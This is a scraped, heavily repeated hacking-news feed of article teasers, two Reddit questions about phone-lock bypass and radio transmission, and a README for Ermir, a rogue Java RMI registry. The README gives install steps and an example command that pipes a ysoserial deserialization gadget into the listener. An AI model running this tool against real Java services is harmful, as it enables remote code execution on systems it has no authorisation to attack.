Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe Year of the Fox Writeup
https://cdn-images-1.medium.com/max/600/1*FCu0aB-c3rMDgn0mV8IckQ.png
Year Of the Fox Walkthrough
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe Year of the Fox Writeup
https://cdn-images-1.medium.com/max/600/1*FCu0aB-c3rMDgn0mV8IckQ.png
Year Of the Fox Walkthrough
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe Year of the Fox Writeup
Year Of the Fox Walkthrough
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Dissecting a (semi) sophisticated gmail scam
https://cdn-images-1.medium.com/max/1033/1*YV89WqLAJuyovCw19Z0pbQ.jpeg
This Amazon Gift Card scam turned out to be quite complex
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Dissecting a (semi) sophisticated gmail scam
https://cdn-images-1.medium.com/max/1033/1*YV89WqLAJuyovCw19Z0pbQ.jpeg
This Amazon Gift Card scam turned out to be quite complex
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Dissecting a (semi) sophisticated gmail scam
This Amazon Gift Card scam turned out to be quite complex
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What is hacktivism ? The artist as hacker in the digital age
https://cdn-images-1.medium.com/max/2000/1*KC0yEQgKw0RFL-Hd4df76w.jpeg
Today, the Internet is an extremely fertile ground for the proliferation of new agents and new forms of artistic production. On the other…
Continue reading on DANAE.IO »
___________________________
@hacking_Attack
@Hacking_Video
What is hacktivism ? The artist as hacker in the digital age
https://cdn-images-1.medium.com/max/2000/1*KC0yEQgKw0RFL-Hd4df76w.jpeg
Today, the Internet is an extremely fertile ground for the proliferation of new agents and new forms of artistic production. On the other…
Continue reading on DANAE.IO »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is hacktivism ? The artist as hacker in the digital age
Today, the Internet is an extremely fertile ground for the proliferation of new agents and new forms of artistic production. On the other…
Hacking on Medium
Marauding Wi-Fi Networks With The Flipper Zero
https://cdn-images-1.medium.com/max/1950/0*wXX7yG5SN7gadgfz.png
Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero to attack Wi-Fi networks. By default, the…
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Marauding Wi-Fi Networks With The Flipper Zero
https://cdn-images-1.medium.com/max/1950/0*wXX7yG5SN7gadgfz.png
Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero to attack Wi-Fi networks. By default, the…
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Marauding Wi-Fi Networks With The Flipper Zero
Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero to attack Wi-Fi networks. By default, the…
hacking: security in practice
A microphone and speaker system used in schools with one set of MHz range.
I know the MHz frequency. Can I send out the certain MHz frequencies with a computer and play or send out audio? Is there a patch(or a minor fix) for this?
submitted by /u/Whitedevil998
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
A microphone and speaker system used in schools with one set of MHz range.
I know the MHz frequency. Can I send out the certain MHz frequencies with a computer and play or send out audio? Is there a patch(or a minor fix) for this?
submitted by /u/Whitedevil998
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
A microphone and speaker system used in schools with one set of...
I know the MHz frequency. Can I send out the certain MHz frequencies with a computer and play or send out audio? Is there a patch(or a minor fix)...
hacking: security in practice
Dead loved ones locked phone
My dead relative has a android phone with a bunch of photos on it.
It never had a backup account to reset and will delete all data after 2 more attempts.
How can I bypass the lock?
Thank you.
submitted by /u/AS_Protocol_BGP
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Dead loved ones locked phone
My dead relative has a android phone with a bunch of photos on it.
It never had a backup account to reset and will delete all data after 2 more attempts.
How can I bypass the lock?
Thank you.
submitted by /u/AS_Protocol_BGP
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Dead loved ones locked phone
My dead relative has a android phone with a bunch of photos on it. It never had a backup account to reset and will delete all data after 2 more...
10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or…Continue reading on Medium »
Read more...
TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
https://cdn-images-1.medium.com/max/640/1*H4O0IcMJ84R7ZraACqap6Q.jpeg
TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
https://cdn-images-1.medium.com/max/640/1*H4O0IcMJ84R7ZraACqap6Q.jpeg
TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or…
10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
https://medium.com/the-gray-area/10-minute-bug-bounties-osint-with-google-dorking-censys-and-shodan-8d567d31dfed?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/the-gray-area/10-minute-bug-bounties-osint-with-google-dorking-censys-and-shodan-8d567d31dfed?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or…
TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or…Continue reading on The Gray Area » (https://medium.com/the-gray-area/10-minute-bug-bounties-osint-with-google-dorking-censys-and-shodan-8d567d31dfed?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or…
5 mistakes to avoid on the bug bounty program
https://medium.com/@radekk/5-mistakes-to-avoid-on-the-bug-bounty-program-23af37228003?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@radekk/5-mistakes-to-avoid-on-the-bug-bounty-program-23af37228003?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
5 mistakes to avoid on the bug bounty program
Improve your testing accuracy and get the most out of your findings
Improve your testing accuracy and get the most out of your findingsContinue reading on Medium » (https://medium.com/@radekk/5-mistakes-to-avoid-on-the-bug-bounty-program-23af37228003?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
5 mistakes to avoid on the bug bounty program
Improve your testing accuracy and get the most out of your findings
5 mistakes to avoid on the bug bounty program
Improve your testing accuracy and get the most out of your findingsContinue reading on Medium »
Read more...
Improve your testing accuracy and get the most out of your findingsContinue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Ermir : An Evil Java RMI Registry
Ermir is an Evil/Rogue RMI Registry, it exploits unsecure deserialization on any Java code calling standard RMI methods on it (
$ gem install ermir
or clone the repo and build the gem:
$ git clone https://github.com/hakivvi/ermir.git
$ rake install UsageErmir is a cli gem, it comes with 2 cli files
➜ ~ ermir
Ermir by @hakivvi * https://github.com/hakivvi/ermir.
Info:
Ermir is a Rogue/Evil RMI Registry which exploits unsecure Java deserialization on any Java code calling standard RMI methods on it.
Usage: ermir [options]
-l, --listen bind the RMI Registry to this ip and port (default: 0.0.0.0:1099).
-f, --file path to file containing the gadget to be deserialized.
-p, --pipe read the serialized gadget from the standard input stream.
-v, --version print Ermir version.
-h, --help print options help.
Example:
$ gadgetmarshal /path/to/ysoserial.jar Groovy1 calc.exe | ermir --listen 127.0.0.1:1099 --pipe
➜ ~ gadgetmarshal
Usage: gadgetmarshal /path/to/ysoserial.jar Gadget1 cmd (optional)/path/to/output/file How does it work?
*
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdaOHO1_sEgsxh-KFwFL69Z18F-43bHQl9NJJI8ujN_su2HYCrZ0b0Xb7DgyUzY481Bx-X_sYOdSwkYAHgrryYAWAVFyBMmWzOYMByT7KKAcVc-IHfeZ4zNzhVNPLlHQVHRUJhLrTutg_VMc-6_UI-HTIrmawAhz8pvRnDMCwxRBuX7gnp1s74PXTJ/s1115/Ermir.png
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-3L2H3V6ljJokLR_PQweExmHLi9tXuQo81g3_BY0TR9HJJb6gDhYC1hpUCrlJ59MIb4U-95c0FdL2hlakFGrRJYC2LnHye7xxpcA9pWyVPSHZXAL6RQxVkfSZLyfjXzIpCAqMBFx_Ty5lNt6DN8tglZ_Pzmgs6i1TIl0AnYCd[...]
___________________________
@hacking_Attack
@Hacking_Video
Ermir : An Evil Java RMI Registry
Ermir is an Evil/Rogue RMI Registry, it exploits unsecure deserialization on any Java code calling standard RMI methods on it (
list()/lookup()/bind()/rebind()/unbind()). Requirements* Ruby v3 or newer. InstallationInstall Ermir from rubygems.org:$ gem install ermir
or clone the repo and build the gem:
$ git clone https://github.com/hakivvi/ermir.git
$ rake install UsageErmir is a cli gem, it comes with 2 cli files
ermirand gadgetmarshal, ermiris the actual gem and the latter is just a pretty interface to GadgetMarshaller.java file which rewrites the gadgets of Ysoserial to match MarshalInputStreamrequirements, the output should be then piped into ermiror a file, in case of custom gadgets use MarshalOutputStreaminstead of ObjectOutputStreamto write your serialized object to the output stream. ermirusage:➜ ~ ermir
Ermir by @hakivvi * https://github.com/hakivvi/ermir.
Info:
Ermir is a Rogue/Evil RMI Registry which exploits unsecure Java deserialization on any Java code calling standard RMI methods on it.
Usage: ermir [options]
-l, --listen bind the RMI Registry to this ip and port (default: 0.0.0.0:1099).
-f, --file path to file containing the gadget to be deserialized.
-p, --pipe read the serialized gadget from the standard input stream.
-v, --version print Ermir version.
-h, --help print options help.
Example:
$ gadgetmarshal /path/to/ysoserial.jar Groovy1 calc.exe | ermir --listen 127.0.0.1:1099 --pipe
gadgetmarshalusage:➜ ~ gadgetmarshal
Usage: gadgetmarshal /path/to/ysoserial.jar Gadget1 cmd (optional)/path/to/output/file How does it work?
java.rmi.registry.Registryoffers 5 methods: list(), lookup(), bind(), rebind(), unbind():*
public Remote lookup(String name): lookup() searches for a bound object in the registry by its name, the registry returns a Remoteobject which references the remote object that was looked up, the returned object is read using MarshalInputStream.readObject()which is just another layer on top of ObjectInputStream, basically it excpects after each class/proxy descriptor (TC_CLASSDESC/TC_PROXYCLASSDESC) an URL that will be used to load this class or proxy class. this is the same wild bug that was fixed in jdk7u21. (Ermir does not specify this URL as only old Java version are vulnerable, instead it just write null). as Ysoserial gadgets are being serialized using ObjectOutputStream, Ermir uses gadgetmarshal-a wrapper around GadgetMarshaller.java– to serialize the specified gagdet to match MarshalInputStreamrequirements.https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdaOHO1_sEgsxh-KFwFL69Z18F-43bHQl9NJJI8ujN_su2HYCrZ0b0Xb7DgyUzY481Bx-X_sYOdSwkYAHgrryYAWAVFyBMmWzOYMByT7KKAcVc-IHfeZ4zNzhVNPLlHQVHRUJhLrTutg_VMc-6_UI-HTIrmawAhz8pvRnDMCwxRBuX7gnp1s74PXTJ/s1115/Ermir.png
public String[] list(): list() asks the registry for all the bound objects names, while Stringtype cannot be subsitued with a malicious gadget as it is not like any ordinary object and it is not read using readObject()but rather readUTF(), however as list()returns String[]which is an actual object and it is read using readObject(), Ermir sends the gadget instead of this String[]type.https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-3L2H3V6ljJokLR_PQweExmHLi9tXuQo81g3_BY0TR9HJJb6gDhYC1hpUCrlJ59MIb4U-95c0FdL2hlakFGrRJYC2LnHye7xxpcA9pWyVPSHZXAL6RQxVkfSZLyfjXzIpCAqMBFx_Ty5lNt6DN8tglZ_Pzmgs6i1TIl0AnYCd[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Ermir : An Evil Java RMI Registry 2022!!!Kalilinuxtutorials
Ermir is an Evil/Rogue RMI Registry, it exploits unsecure deserialization on any Java code calling standard RMI methods on it (list()/lookup()/bind()/rebind()/unbind()). Requirements Installation Install Ermir from rubygems.org: $ gem install ermir or clone…